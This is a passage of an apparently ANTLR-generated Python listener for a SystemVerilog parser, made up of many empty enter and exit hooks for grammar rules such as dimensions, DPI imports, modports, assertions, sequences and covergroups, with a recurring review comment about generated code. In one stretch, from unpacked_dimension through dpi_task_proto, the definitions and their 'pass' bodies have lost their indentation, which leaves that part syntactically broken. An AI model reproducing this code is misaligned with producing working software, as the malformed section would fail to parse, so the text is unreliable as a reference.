    def enterVariable_decl_assignment(self, ctx:SystemVerilogParser.Variable_decl_assignmentContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#variable_decl_assignment.
    def exitVariable_decl_assignment(self, ctx:SystemVerilogParser.Variable_decl_assignmentContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#class_new.
    def enterClass_new(self, ctx:SystemVerilogParser.Class_newContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#class_new.
    def exitClass_new(self, ctx:SystemVerilogParser.Class_newContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#dynamic_array_new.
    def enterDynamic_array_new(self, ctx:SystemVerilogParser.Dynamic_array_newContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#dynamic_array_new.
    def exitDynamic_array_new(self, ctx:SystemVerilogParser.Dynamic_array_newContext):
        pass
# Enter a parse tree produced by SystemVerilogParser#unpacked_dimension.
def enterUnpacked_dimension(self, ctx:SystemVerilogParser.Unpacked_dimensionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#unpacked_dimension.
def exitUnpacked_dimension(self, ctx:SystemVerilogParser.Unpacked_dimensionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#packed_dimension.
def enterPacked_dimension(self, ctx:SystemVerilogParser.Packed_dimensionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#packed_dimension.
def exitPacked_dimension(self, ctx:SystemVerilogParser.Packed_dimensionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#associative_dimension.
def enterAssociative_dimension(self, ctx:SystemVerilogParser.Associative_dimensionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#associative_dimension.
def exitAssociative_dimension(self, ctx:SystemVerilogParser.Associative_dimensionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#variable_dimension.
def enterVariable_dimension(self, ctx:SystemVerilogParser.Variable_dimensionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#variable_dimension.
def exitVariable_dimension(self, ctx:SystemVerilogParser.Variable_dimensionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#queue_dimension.
def enterQueue_dimension(self, ctx:SystemVerilogParser.Queue_dimensionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#queue_dimension.
def exitQueue_dimension(self, ctx:SystemVerilogParser.Queue_dimensionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#unsized_dimension.
def enterUnsized_dimension(self, ctx:SystemVerilogParser.Unsized_dimensionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#unsized_dimension.
def exitUnsized_dimension(self, ctx:SystemVerilogParser.Unsized_dimensionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#function_data_type_or_implicit.
def enterFunction_data_type_or_implicit(self, ctx:SystemVerilogParser.Function_data_type_or_implicitContext):
pass
# Exit a parse tree produced by SystemVerilogParser#function_data_type_or_implicit.
def exitFunction_data_type_or_implicit(self, ctx:SystemVerilogParser.Function_data_type_or_implicitContext):
pass
# Enter a parse tree produced by SystemVerilogParser#function_declaration.
def enterFunction_declaration(self, ctx:SystemVerilogParser.Function_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#function_declaration.
def exitFunction_declaration(self, ctx:SystemVerilogParser.Function_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#function_body_declaration.
def enterFunction_body_declaration(self, ctx:SystemVerilogParser.Function_body_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#function_body_declaration.
def exitFunction_body_declaration(self, ctx:SystemVerilogParser.Function_body_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#function_prototype.
def enterFunction_prototype(self, ctx:SystemVerilogParser.Function_prototypeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#function_prototype.
def exitFunction_prototype(self, ctx:SystemVerilogParser.Function_prototypeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#dpi_import_export.
def enterDpi_import_export(self, ctx:SystemVerilogParser.Dpi_import_exportContext):
pass
# Exit a parse tree produced by SystemVerilogParser#dpi_import_export.
def exitDpi_import_export(self, ctx:SystemVerilogParser.Dpi_import_exportContext):
pass
# Enter a parse tree produced by SystemVerilogParser#dpi_spec_string.
def enterDpi_spec_string(self, ctx:SystemVerilogParser.Dpi_spec_stringContext):
pass
# Exit a parse tree produced by SystemVerilogParser#dpi_spec_string.
def exitDpi_spec_string(self, ctx:SystemVerilogParser.Dpi_spec_stringContext):
pass
# Enter a parse tree produced by SystemVerilogParser#dpi_function_import_property.
def enterDpi_function_import_property(self, ctx:SystemVerilogParser.Dpi_function_import_propertyContext):
pass
# Exit a parse tree produced by SystemVerilogParser#dpi_function_import_property.
def exitDpi_function_import_property(self, ctx:SystemVerilogParser.Dpi_function_import_propertyContext):
pass
# Enter a parse tree produced by SystemVerilogParser#dpi_task_import_property.
def enterDpi_task_import_property(self, ctx:SystemVerilogParser.Dpi_task_import_propertyContext):
pass
# Exit a parse tree produced by SystemVerilogParser#dpi_task_import_property.
def exitDpi_task_import_property(self, ctx:SystemVerilogParser.Dpi_task_import_propertyContext):
pass
# Enter a parse tree produced by SystemVerilogParser#dpi_function_proto.
def enterDpi_function_proto(self, ctx:SystemVerilogParser.Dpi_function_protoContext):
pass
# Exit a parse tree produced by SystemVerilogParser#dpi_function_proto.
def exitDpi_function_proto(self, ctx:SystemVerilogParser.Dpi_function_protoContext):
pass
# Enter a parse tree produced by SystemVerilogParser#dpi_task_proto.
def enterDpi_task_proto(self, ctx:SystemVerilogParser.Dpi_task_protoContext):
pass
# Exit a parse tree produced by SystemVerilogParser#dpi_task_proto.
def exitDpi_task_proto(self, ctx:SystemVerilogParser.Dpi_task_protoContext):
pass
    # ANTLR-generated no-op listener hooks: the parse-tree walker invokes each
    # enter*/exit* method when the matching grammar rule is entered/exited;
    # override in a subclass to add behavior.  NOTE(review): generated code —
    # do not edit by hand; regenerate from the grammar (.g4) instead.
    # Enter a parse tree produced by SystemVerilogParser#task_declaration.
    def enterTask_declaration(self, ctx:SystemVerilogParser.Task_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#task_declaration.
    def exitTask_declaration(self, ctx:SystemVerilogParser.Task_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#task_body_declaration.
    def enterTask_body_declaration(self, ctx:SystemVerilogParser.Task_body_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#task_body_declaration.
    def exitTask_body_declaration(self, ctx:SystemVerilogParser.Task_body_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#tf_item_declaration.
    def enterTf_item_declaration(self, ctx:SystemVerilogParser.Tf_item_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#tf_item_declaration.
    def exitTf_item_declaration(self, ctx:SystemVerilogParser.Tf_item_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#tf_port_list.
    def enterTf_port_list(self, ctx:SystemVerilogParser.Tf_port_listContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#tf_port_list.
    def exitTf_port_list(self, ctx:SystemVerilogParser.Tf_port_listContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#tf_port_item.
    def enterTf_port_item(self, ctx:SystemVerilogParser.Tf_port_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#tf_port_item.
    def exitTf_port_item(self, ctx:SystemVerilogParser.Tf_port_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#tf_port_direction.
    def enterTf_port_direction(self, ctx:SystemVerilogParser.Tf_port_directionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#tf_port_direction.
    def exitTf_port_direction(self, ctx:SystemVerilogParser.Tf_port_directionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#tf_port_declaration.
    def enterTf_port_declaration(self, ctx:SystemVerilogParser.Tf_port_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#tf_port_declaration.
    def exitTf_port_declaration(self, ctx:SystemVerilogParser.Tf_port_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#task_prototype.
    def enterTask_prototype(self, ctx:SystemVerilogParser.Task_prototypeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#task_prototype.
    def exitTask_prototype(self, ctx:SystemVerilogParser.Task_prototypeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#block_item_declaration.
    def enterBlock_item_declaration(self, ctx:SystemVerilogParser.Block_item_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#block_item_declaration.
    def exitBlock_item_declaration(self, ctx:SystemVerilogParser.Block_item_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#modport_declaration.
    def enterModport_declaration(self, ctx:SystemVerilogParser.Modport_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#modport_declaration.
    def exitModport_declaration(self, ctx:SystemVerilogParser.Modport_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#modport_item.
    def enterModport_item(self, ctx:SystemVerilogParser.Modport_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#modport_item.
    def exitModport_item(self, ctx:SystemVerilogParser.Modport_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#modport_ports_declaration.
    def enterModport_ports_declaration(self, ctx:SystemVerilogParser.Modport_ports_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#modport_ports_declaration.
    def exitModport_ports_declaration(self, ctx:SystemVerilogParser.Modport_ports_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#modport_clocking_declaration.
    def enterModport_clocking_declaration(self, ctx:SystemVerilogParser.Modport_clocking_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#modport_clocking_declaration.
    def exitModport_clocking_declaration(self, ctx:SystemVerilogParser.Modport_clocking_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#modport_simple_ports_declaration.
    def enterModport_simple_ports_declaration(self, ctx:SystemVerilogParser.Modport_simple_ports_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#modport_simple_ports_declaration.
    def exitModport_simple_ports_declaration(self, ctx:SystemVerilogParser.Modport_simple_ports_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#modport_simple_port.
    def enterModport_simple_port(self, ctx:SystemVerilogParser.Modport_simple_portContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#modport_simple_port.
    def exitModport_simple_port(self, ctx:SystemVerilogParser.Modport_simple_portContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#modport_tf_ports_declaration.
    def enterModport_tf_ports_declaration(self, ctx:SystemVerilogParser.Modport_tf_ports_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#modport_tf_ports_declaration.
    def exitModport_tf_ports_declaration(self, ctx:SystemVerilogParser.Modport_tf_ports_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#modport_tf_port.
    def enterModport_tf_port(self, ctx:SystemVerilogParser.Modport_tf_portContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#modport_tf_port.
    def exitModport_tf_port(self, ctx:SystemVerilogParser.Modport_tf_portContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#import_export.
    def enterImport_export(self, ctx:SystemVerilogParser.Import_exportContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#import_export.
    def exitImport_export(self, ctx:SystemVerilogParser.Import_exportContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#concurrent_assertion_item.
    def enterConcurrent_assertion_item(self, ctx:SystemVerilogParser.Concurrent_assertion_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#concurrent_assertion_item.
    def exitConcurrent_assertion_item(self, ctx:SystemVerilogParser.Concurrent_assertion_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#concurrent_assertion_statement.
    def enterConcurrent_assertion_statement(self, ctx:SystemVerilogParser.Concurrent_assertion_statementContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#concurrent_assertion_statement.
    def exitConcurrent_assertion_statement(self, ctx:SystemVerilogParser.Concurrent_assertion_statementContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#assert_property_statement.
    def enterAssert_property_statement(self, ctx:SystemVerilogParser.Assert_property_statementContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#assert_property_statement.
    def exitAssert_property_statement(self, ctx:SystemVerilogParser.Assert_property_statementContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#assume_property_statement.
    def enterAssume_property_statement(self, ctx:SystemVerilogParser.Assume_property_statementContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#assume_property_statement.
    def exitAssume_property_statement(self, ctx:SystemVerilogParser.Assume_property_statementContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#cover_property_statement.
    def enterCover_property_statement(self, ctx:SystemVerilogParser.Cover_property_statementContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#cover_property_statement.
    def exitCover_property_statement(self, ctx:SystemVerilogParser.Cover_property_statementContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#expect_property_statement.
    def enterExpect_property_statement(self, ctx:SystemVerilogParser.Expect_property_statementContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#expect_property_statement.
    def exitExpect_property_statement(self, ctx:SystemVerilogParser.Expect_property_statementContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#cover_sequence_statement.
    def enterCover_sequence_statement(self, ctx:SystemVerilogParser.Cover_sequence_statementContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#cover_sequence_statement.
    def exitCover_sequence_statement(self, ctx:SystemVerilogParser.Cover_sequence_statementContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#restrict_property_statement.
    def enterRestrict_property_statement(self, ctx:SystemVerilogParser.Restrict_property_statementContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#restrict_property_statement.
    def exitRestrict_property_statement(self, ctx:SystemVerilogParser.Restrict_property_statementContext):
        pass
    # ANTLR-generated no-op listener hooks: the parse-tree walker invokes each
    # enter*/exit* method when the matching grammar rule is entered/exited;
    # override in a subclass to add behavior.  NOTE(review): generated code —
    # do not edit by hand; regenerate from the grammar (.g4) instead.
    # Enter a parse tree produced by SystemVerilogParser#property_instance.
    def enterProperty_instance(self, ctx:SystemVerilogParser.Property_instanceContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#property_instance.
    def exitProperty_instance(self, ctx:SystemVerilogParser.Property_instanceContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#property_list_of_arguments.
    def enterProperty_list_of_arguments(self, ctx:SystemVerilogParser.Property_list_of_argumentsContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#property_list_of_arguments.
    def exitProperty_list_of_arguments(self, ctx:SystemVerilogParser.Property_list_of_argumentsContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#property_actual_arg.
    def enterProperty_actual_arg(self, ctx:SystemVerilogParser.Property_actual_argContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#property_actual_arg.
    def exitProperty_actual_arg(self, ctx:SystemVerilogParser.Property_actual_argContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#assertion_item_declaration.
    def enterAssertion_item_declaration(self, ctx:SystemVerilogParser.Assertion_item_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#assertion_item_declaration.
    def exitAssertion_item_declaration(self, ctx:SystemVerilogParser.Assertion_item_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#property_declaration.
    def enterProperty_declaration(self, ctx:SystemVerilogParser.Property_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#property_declaration.
    def exitProperty_declaration(self, ctx:SystemVerilogParser.Property_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#property_port_list.
    def enterProperty_port_list(self, ctx:SystemVerilogParser.Property_port_listContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#property_port_list.
    def exitProperty_port_list(self, ctx:SystemVerilogParser.Property_port_listContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#property_port_item.
    def enterProperty_port_item(self, ctx:SystemVerilogParser.Property_port_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#property_port_item.
    def exitProperty_port_item(self, ctx:SystemVerilogParser.Property_port_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#property_lvar_port_direction.
    def enterProperty_lvar_port_direction(self, ctx:SystemVerilogParser.Property_lvar_port_directionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#property_lvar_port_direction.
    def exitProperty_lvar_port_direction(self, ctx:SystemVerilogParser.Property_lvar_port_directionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#property_formal_type.
    def enterProperty_formal_type(self, ctx:SystemVerilogParser.Property_formal_typeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#property_formal_type.
    def exitProperty_formal_type(self, ctx:SystemVerilogParser.Property_formal_typeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#property_spec.
    def enterProperty_spec(self, ctx:SystemVerilogParser.Property_specContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#property_spec.
    def exitProperty_spec(self, ctx:SystemVerilogParser.Property_specContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#property_expr.
    def enterProperty_expr(self, ctx:SystemVerilogParser.Property_exprContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#property_expr.
    def exitProperty_expr(self, ctx:SystemVerilogParser.Property_exprContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#property_case_item.
    def enterProperty_case_item(self, ctx:SystemVerilogParser.Property_case_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#property_case_item.
    def exitProperty_case_item(self, ctx:SystemVerilogParser.Property_case_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#sequence_declaration.
    def enterSequence_declaration(self, ctx:SystemVerilogParser.Sequence_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#sequence_declaration.
    def exitSequence_declaration(self, ctx:SystemVerilogParser.Sequence_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#sequence_port_list.
    def enterSequence_port_list(self, ctx:SystemVerilogParser.Sequence_port_listContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#sequence_port_list.
    def exitSequence_port_list(self, ctx:SystemVerilogParser.Sequence_port_listContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#sequence_port_item.
    def enterSequence_port_item(self, ctx:SystemVerilogParser.Sequence_port_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#sequence_port_item.
    def exitSequence_port_item(self, ctx:SystemVerilogParser.Sequence_port_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#sequence_lvar_port_direction.
    def enterSequence_lvar_port_direction(self, ctx:SystemVerilogParser.Sequence_lvar_port_directionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#sequence_lvar_port_direction.
    def exitSequence_lvar_port_direction(self, ctx:SystemVerilogParser.Sequence_lvar_port_directionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#sequence_formal_type.
    def enterSequence_formal_type(self, ctx:SystemVerilogParser.Sequence_formal_typeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#sequence_formal_type.
    def exitSequence_formal_type(self, ctx:SystemVerilogParser.Sequence_formal_typeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#sequence_expr.
    def enterSequence_expr(self, ctx:SystemVerilogParser.Sequence_exprContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#sequence_expr.
    def exitSequence_expr(self, ctx:SystemVerilogParser.Sequence_exprContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#cycle_delay_range.
    def enterCycle_delay_range(self, ctx:SystemVerilogParser.Cycle_delay_rangeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#cycle_delay_range.
    def exitCycle_delay_range(self, ctx:SystemVerilogParser.Cycle_delay_rangeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#sequence_method_call.
    def enterSequence_method_call(self, ctx:SystemVerilogParser.Sequence_method_callContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#sequence_method_call.
    def exitSequence_method_call(self, ctx:SystemVerilogParser.Sequence_method_callContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#sequence_match_item.
    def enterSequence_match_item(self, ctx:SystemVerilogParser.Sequence_match_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#sequence_match_item.
    def exitSequence_match_item(self, ctx:SystemVerilogParser.Sequence_match_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#sequence_instance.
    def enterSequence_instance(self, ctx:SystemVerilogParser.Sequence_instanceContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#sequence_instance.
    def exitSequence_instance(self, ctx:SystemVerilogParser.Sequence_instanceContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#sequence_list_of_arguments.
    def enterSequence_list_of_arguments(self, ctx:SystemVerilogParser.Sequence_list_of_argumentsContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#sequence_list_of_arguments.
    def exitSequence_list_of_arguments(self, ctx:SystemVerilogParser.Sequence_list_of_argumentsContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#sequence_actual_arg.
    def enterSequence_actual_arg(self, ctx:SystemVerilogParser.Sequence_actual_argContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#sequence_actual_arg.
    def exitSequence_actual_arg(self, ctx:SystemVerilogParser.Sequence_actual_argContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#boolean_abbrev.
    def enterBoolean_abbrev(self, ctx:SystemVerilogParser.Boolean_abbrevContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#boolean_abbrev.
    def exitBoolean_abbrev(self, ctx:SystemVerilogParser.Boolean_abbrevContext):
        pass
    # ANTLR-generated no-op listener hooks: the parse-tree walker invokes each
    # enter*/exit* method when the matching grammar rule is entered/exited;
    # override in a subclass to add behavior.  NOTE(review): generated code —
    # do not edit by hand; regenerate from the grammar (.g4) instead.
    # Enter a parse tree produced by SystemVerilogParser#sequence_abbrev.
    def enterSequence_abbrev(self, ctx:SystemVerilogParser.Sequence_abbrevContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#sequence_abbrev.
    def exitSequence_abbrev(self, ctx:SystemVerilogParser.Sequence_abbrevContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#consecutive_repetition.
    def enterConsecutive_repetition(self, ctx:SystemVerilogParser.Consecutive_repetitionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#consecutive_repetition.
    def exitConsecutive_repetition(self, ctx:SystemVerilogParser.Consecutive_repetitionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#non_consecutive_repetition.
    def enterNon_consecutive_repetition(self, ctx:SystemVerilogParser.Non_consecutive_repetitionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#non_consecutive_repetition.
    def exitNon_consecutive_repetition(self, ctx:SystemVerilogParser.Non_consecutive_repetitionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#goto_repetition.
    def enterGoto_repetition(self, ctx:SystemVerilogParser.Goto_repetitionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#goto_repetition.
    def exitGoto_repetition(self, ctx:SystemVerilogParser.Goto_repetitionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#const_or_range_expression.
    def enterConst_or_range_expression(self, ctx:SystemVerilogParser.Const_or_range_expressionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#const_or_range_expression.
    def exitConst_or_range_expression(self, ctx:SystemVerilogParser.Const_or_range_expressionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#cycle_delay_const_range_expression.
    def enterCycle_delay_const_range_expression(self, ctx:SystemVerilogParser.Cycle_delay_const_range_expressionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#cycle_delay_const_range_expression.
    def exitCycle_delay_const_range_expression(self, ctx:SystemVerilogParser.Cycle_delay_const_range_expressionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#expression_or_dist.
    def enterExpression_or_dist(self, ctx:SystemVerilogParser.Expression_or_distContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#expression_or_dist.
    def exitExpression_or_dist(self, ctx:SystemVerilogParser.Expression_or_distContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#assertion_variable_declaration.
    def enterAssertion_variable_declaration(self, ctx:SystemVerilogParser.Assertion_variable_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#assertion_variable_declaration.
    def exitAssertion_variable_declaration(self, ctx:SystemVerilogParser.Assertion_variable_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#covergroup_declaration.
    def enterCovergroup_declaration(self, ctx:SystemVerilogParser.Covergroup_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#covergroup_declaration.
    def exitCovergroup_declaration(self, ctx:SystemVerilogParser.Covergroup_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#coverage_spec_or_option.
    def enterCoverage_spec_or_option(self, ctx:SystemVerilogParser.Coverage_spec_or_optionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#coverage_spec_or_option.
    def exitCoverage_spec_or_option(self, ctx:SystemVerilogParser.Coverage_spec_or_optionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#coverage_option.
    def enterCoverage_option(self, ctx:SystemVerilogParser.Coverage_optionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#coverage_option.
    def exitCoverage_option(self, ctx:SystemVerilogParser.Coverage_optionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#coverage_spec.
    def enterCoverage_spec(self, ctx:SystemVerilogParser.Coverage_specContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#coverage_spec.
    def exitCoverage_spec(self, ctx:SystemVerilogParser.Coverage_specContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#coverage_event.
    def enterCoverage_event(self, ctx:SystemVerilogParser.Coverage_eventContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#coverage_event.
    def exitCoverage_event(self, ctx:SystemVerilogParser.Coverage_eventContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#block_event_expression.
    def enterBlock_event_expression(self, ctx:SystemVerilogParser.Block_event_expressionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#block_event_expression.
    def exitBlock_event_expression(self, ctx:SystemVerilogParser.Block_event_expressionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#hierarchical_btf_identifier.
    def enterHierarchical_btf_identifier(self, ctx:SystemVerilogParser.Hierarchical_btf_identifierContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#hierarchical_btf_identifier.
    def exitHierarchical_btf_identifier(self, ctx:SystemVerilogParser.Hierarchical_btf_identifierContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#cover_point.
    def enterCover_point(self, ctx:SystemVerilogParser.Cover_pointContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#cover_point.
    def exitCover_point(self, ctx:SystemVerilogParser.Cover_pointContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#bins_or_empty.
    def enterBins_or_empty(self, ctx:SystemVerilogParser.Bins_or_emptyContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#bins_or_empty.
    def exitBins_or_empty(self, ctx:SystemVerilogParser.Bins_or_emptyContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#bins_or_options.
    def enterBins_or_options(self, ctx:SystemVerilogParser.Bins_or_optionsContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#bins_or_options.
    def exitBins_or_options(self, ctx:SystemVerilogParser.Bins_or_optionsContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#bins_keyword.
    def enterBins_keyword(self, ctx:SystemVerilogParser.Bins_keywordContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#bins_keyword.
    def exitBins_keyword(self, ctx:SystemVerilogParser.Bins_keywordContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#trans_list.
    def enterTrans_list(self, ctx:SystemVerilogParser.Trans_listContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#trans_list.
    def exitTrans_list(self, ctx:SystemVerilogParser.Trans_listContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#trans_set.
    def enterTrans_set(self, ctx:SystemVerilogParser.Trans_setContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#trans_set.
    def exitTrans_set(self, ctx:SystemVerilogParser.Trans_setContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#trans_range_list.
    def enterTrans_range_list(self, ctx:SystemVerilogParser.Trans_range_listContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#trans_range_list.
    def exitTrans_range_list(self, ctx:SystemVerilogParser.Trans_range_listContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#trans_item.
    def enterTrans_item(self, ctx:SystemVerilogParser.Trans_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#trans_item.
    def exitTrans_item(self, ctx:SystemVerilogParser.Trans_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#repeat_range.
    def enterRepeat_range(self, ctx:SystemVerilogParser.Repeat_rangeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#repeat_range.
    def exitRepeat_range(self, ctx:SystemVerilogParser.Repeat_rangeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#cover_cross.
    def enterCover_cross(self, ctx:SystemVerilogParser.Cover_crossContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#cover_cross.
    def exitCover_cross(self, ctx:SystemVerilogParser.Cover_crossContext):
        pass
